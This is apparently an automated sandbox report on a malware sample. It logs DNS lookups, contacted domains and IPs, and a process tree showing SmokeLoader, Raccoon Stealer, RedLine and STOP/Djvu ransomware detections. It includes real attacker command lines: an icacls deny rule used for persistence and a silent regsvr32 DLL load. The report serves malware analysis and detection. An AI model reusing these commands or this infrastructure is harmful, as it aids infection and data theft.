                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org190.107.133.19A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org151.251.24.5A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org87.119.100.220A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org211.171.233.129A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org210.182.29.70A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org115.88.24.202A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.315112114 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org115.88.24.203A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org115.88.24.202A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org175.120.254.9A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org187.212.184.129A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org190.140.99.150A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org151.251.24.5A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org211.59.14.90A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org211.119.84.111A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org186.6.243.2A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org115.88.24.203A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:12.559225082 CEST8.8.8.8192.168.2.30x10c3No error (0)acacaca.org190.117.75.91A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at110.14.121.125A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at87.119.100.220A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at211.119.84.111A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at211.53.230.67A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at58.235.189.192A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at46.195.219.190A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at211.59.14.90A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at175.120.254.9A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at138.36.3.134A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:13.686130047 CEST8.8.8.8192.168.2.30xb552No error (0)linislominyt11.at176.44.127.165A (IP address)IN (0x0001)
                                                            Aug 11, 2022 06:54:14.685503006 CEST8.8.8.8192.168.2.30xa8eeNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)
                                                            • ynbbrbceap.org
                                                              • linislominyt11.at
                                                            • oywaxqplv.net
                                                            • grmajt.com
                                                            • ujdgu.net
                                                            • 45.138.74.104
                                                            • xysctbcs.com
                                                            • hghdetsybj.com
                                                            • niskfgcbn.org
                                                            • vuhmrda.org
                                                            • kmthapyqsb.org
                                                            • tqgrrc.org
                                                            • ppejyk.com
                                                            • 85.192.63.46
                                                            • kekatmodj.org
                                                            • 62.204.41.178
                                                            • rgvwxic.org
                                                            • kxdfdo.com
                                                            • 193.56.146.177
                                                            • acacaca.org

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:06:52:05
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\Desktop\5tLwjRFzAW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\5tLwjRFzAW.exe"
                                                            Imagebase:0x400000
                                                            File size:253952 bytes
                                                            MD5 hash:203EAECA3C89F5CA7DC82668C4883B5A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.294980929.00000000026E7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.294639140.0000000002680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            Target ID:4
                                                            Start time:06:52:12
                                                            Start date:11/08/2022
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0x7ff6b8cf0000
                                                            File size:3933184 bytes
                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high

                                                            Target ID:17
                                                            Start time:06:52:49
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Roaming\irbiwat
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Roaming\irbiwat
                                                            Imagebase:0x400000
                                                            File size:253952 bytes
                                                            MD5 hash:203EAECA3C89F5CA7DC82668C4883B5A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.343161421.00000000040E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.342997867.0000000002546000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            Target ID:20
                                                            Start time:06:53:07
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\28E9.exe
                                                            Imagebase:0x400000
                                                            File size:348160 bytes
                                                            MD5 hash:FEEEAA3A0D766A6C52B71C23F796912D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000002.418605685.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.397574395.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.390943564.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.381054499.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.419481551.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.389798020.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.418304961.0000000000499000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.393288664.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.392382222.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.392760515.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.372026419.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.391797560.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 81%, ReversingLabs
                                                            Reputation:low

                                                            Target ID:27
                                                            Start time:06:53:40
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            Imagebase:0x400000
                                                            File size:877568 bytes
                                                            MD5 hash:1FDD74F600A1E3A9CFA80026CF54BC59
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.457366920.000000000066D000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            Target ID:28
                                                            Start time:06:53:43
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            Imagebase:0x400000
                                                            File size:877568 bytes
                                                            MD5 hash:1FDD74F600A1E3A9CFA80026CF54BC59
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000000.451618454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.485432276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000000.447519166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000000.445516045.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000000.448145727.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000000.449295110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                            • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000000.446739246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low

                                                            Target ID:30
                                                            Start time:06:53:50
                                                            Start date:11/08/2022
                                                            Path:C:\Windows\System32\regsvr32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\D0E3.dll
                                                            Imagebase:0x7ff601900000
                                                            File size:24064 bytes
                                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:31
                                                            Start time:06:53:51
                                                            Start date:11/08/2022
                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline: /s C:\Users\user\AppData\Local\Temp\D0E3.dll
                                                            Imagebase:0xeb0000
                                                            File size:20992 bytes
                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001F.00000002.502148462.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high

                                                            Target ID:32
                                                            Start time:06:53:52
                                                            Start date:11/08/2022
                                                            Path:C:\Windows\SysWOW64\icacls.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:icacls "C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                            Imagebase:0x1c0000
                                                            File size:29696 bytes
                                                            MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:33
                                                            Start time:06:53:54
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe --Task
                                                            Imagebase:0x400000
                                                            File size:877568 bytes
                                                            MD5 hash:1FDD74F600A1E3A9CFA80026CF54BC59
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low

                                                            Target ID:35
                                                            Start time:06:53:55
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\E69F.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\E69F.exe
                                                            Imagebase:0x400000
                                                            File size:502784 bytes
                                                            MD5 hash:681D98300C552B8C470466D9E8328C8A
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000023.00000002.596787162.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            Target ID:39
                                                            Start time:06:54:01
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\A658.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\A658.exe" --Admin IsNotAutoStart IsNotTask
                                                            Imagebase:0x400000
                                                            File size:877568 bytes
                                                            MD5 hash:1FDD74F600A1E3A9CFA80026CF54BC59
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 47%, Metadefender, Browse
                                                            • Detection: 56%, ReversingLabs
                                                            Reputation:low

                                                            Target ID:40
                                                            Start time:06:54:02
                                                            Start date:11/08/2022
                                                            Path:C:\Users\user\AppData\Local\Temp\33.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\33.exe
                                                            Imagebase:0xb50000
                                                            File size:371184 bytes
                                                            MD5 hash:C9143FA5E2792724172980E5ACC312F0
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low

                                                            No disassembly